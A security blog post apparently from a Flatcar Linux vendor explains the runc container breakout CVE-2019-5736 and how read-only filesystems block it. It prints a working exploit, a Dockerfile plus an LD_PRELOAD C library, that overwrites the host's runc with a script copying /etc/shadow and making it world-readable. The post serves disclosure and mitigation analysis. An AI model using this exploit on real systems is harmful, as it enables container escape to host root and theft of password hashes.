runc “breakout” Vulnerability Mitigated on Flatcar Linux

Last week, the maintainers of runc disclosed a high-severity vulnerability, CVE-2019-5736 (“runc container breakout”). It is rated high severity (CVSS score 7.2) because it allows a malicious container to overwrite the host's runc binary and thereby gain root privileges on the host. According to our research, however, the vulnerability is not exploitable on Flatcar Linux, thanks to its read-only filesystems.

runc vulnerability background

In the context of our security work, we were asked to evaluate the severity of the report with respect to a client’s installation. As part of this evaluation, we wrote an exploit to understand how the vulnerability works and to test whether the installation was vulnerable. While we recognized the severity of the issue, we also established that the client was not affected. To understand why, let’s compare how things should work with what happens when the exploit runs successfully.

How containers should work

Let’s first look at the following diagram showing how runc should work.

runc forks a new process that becomes pid 1 of the container. Following the traditional Unix fork/exec model, that process is at first only a copy of its parent and therefore still runs the runc program: even while running in the container, its /proc/self/exe points to runc.

Then, pid 1 executes the container's entrypoint, which replaces the runc program with the program from the container image.

How our runc exploit works

The runc exploit code changes the normal behaviour in the following ways:

Instead of running a program from the container image, we set the entrypoint to /proc/self/exe, so runc executes runc again. As a result, /proc/1/exe keeps referring to the host's runc binary for longer.
However, we don’t want the runc code itself to run. Using LD_PRELOAD, we inject a routine that sleeps for a few seconds, so that /proc/1/exe still refers to runc for the next step.
During those few seconds, we have enough time to enter the container with runc exec and open /proc/1/exe while it still points to runc (file descriptor 10 in our exploit).
At this point, we cannot open runc in read-write mode because pid 1 is still running it; the kernel would refuse with the error ETXTBSY (“Text file busy”).
When the sleep in pid 1 ends, pid 1 executes something else (another sleep, this time via /bin/sh), so it no longer keeps runc busy.
Finally, we still hold a read-only file descriptor to the runc binary on the host filesystem, and we use tee /proc/self/fd/10 to reopen it in write mode and overwrite the runc binary.

Our exploit container image simply builds and preloads a small LD_PRELOAD library:

FROM fedora:latest
RUN ln -s /proc/self/exe /exe
RUN dnf install -y gcc
RUN mkdir -p /src
COPY foo.c /
RUN gcc -Wall -o /foo.so -shared -fPIC /foo.c -ldl
ENV LD_PRELOAD=/foo.so
CMD [ "/usr/bin/sh" ]

Here is the source code of foo.c:

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>

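/* Constructor: runs as soon as foo.so is loaded via LD_PRELOAD,
   before the main() of the program it is injected into. */
static void __myinit(void) __attribute__((constructor));
static void __myinit(void)
{
  pid_t pid;

  /* Keep the library out of the processes spawned below. */
  unsetenv("LD_PRELOAD");

  pid = getpid();
  if (pid == 1) {
    /* Container init, i.e. runc re-executed via /proc/self/exe: sleep so
       that /proc/1/exe keeps pointing at the host's runc binary. */
    printf("I am pid 1. Sleeping 3 seconds...\n");
    sleep(3);
    /* Replace the runc image with a shell, so runc is no longer busy
       and can be opened for writing. */
    printf("I am pid 1. Sleeping forever...\n");
    execl("/bin/sh", "sh", "-c",
          "/bin/sleep 1000",
          (char *) 0);
    exit(0); /* only reached if execl() fails */
  }

  /* Any other pid: a process entering the container with docker exec.
     Open fd 10 read-only on /proc/1/exe while it is still runc, wait for
     pid 1 to exec away, then reopen fd 10 for writing through
     /proc/self/fd/10 and replace runc with a shell script. */
  printf("I am pid %d. Starting Hijack...\n", (int) pid);
  execl("/bin/sh", "sh", "-c",
        "exec 10< /proc/1/exe ; "
        "echo Lookup inode of /proc/1/exe: ; "
        "stat -L --format=%i /proc/1/exe ; "
        "echo sleep 4 ; "
        "sleep 4 ; "
        "printf '#!/bin/sh\\ncp /etc/shadow /home/ubuntu/\\nchmod 444 /home/ubuntu/shadow\\n' | tee /proc/self/fd/10 > /dev/null ; "
        "echo done ; ",
        (char *) 0);

  exit(0); /* only reached if execl() fails */
}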

This program is a single constructor function compiled into foo.so and loaded through the LD_PRELOAD environment variable. It runs both in the initial process of the container (pid 1) and in every process started in the container with docker exec. When running as pid 1 (if (pid == 1)), it executes the red part of the diagram above; when running via docker exec, it executes the bottom part of the diagram above.

Running the exploit on Ubuntu

When we tried this on Ubuntu, we were able to overwrite runc on the host.

When the exploit runs, /usr/bin/docker-runc is overwritten with the malicious script. The next time Docker invokes runc, the script runs as root on the host, copies the shadow password file /etc/shadow to /home/ubuntu/shadow and makes it readable by everyone.

Trying the exploit on Flatcar Linux

We then tried the same exploit on Flatcar Linux, and it did not achieve the same result.

Flatcar Linux mounts /usr read-only, which protects most programs from being overwritten. In this test, however, Docker does not use /usr/bin/runc but /run/torcx/unpack/docker/bin/runc, which is managed by torcx. torcx also places its programs on a read-only mount, so this runc binary is protected in the same way: reopening it for writing fails with EROFS (“Read-only file system”) instead of replacing it.

Conclusion

As we have demonstrated, the read-only filesystems of Flatcar Linux mitigate this runc vulnerability, and they can also help against similar exploits that rely on overwriting host binaries. In addition, Flatcar Linux delivers updates automatically, including security fixes. These are some of the reasons we are pushing Flatcar Linux forward and using it as the base for our upcoming open source products.

Since we developed our own exploit, the researchers who found this vulnerability and the maintainers of runc have also published their exploit, which works in a similar way.

If you want to learn more about Flatcar Linux, head over to flatcar-linux.org.

If you need help with security assessments, penetration testing, or engineering services, contact us at [email protected].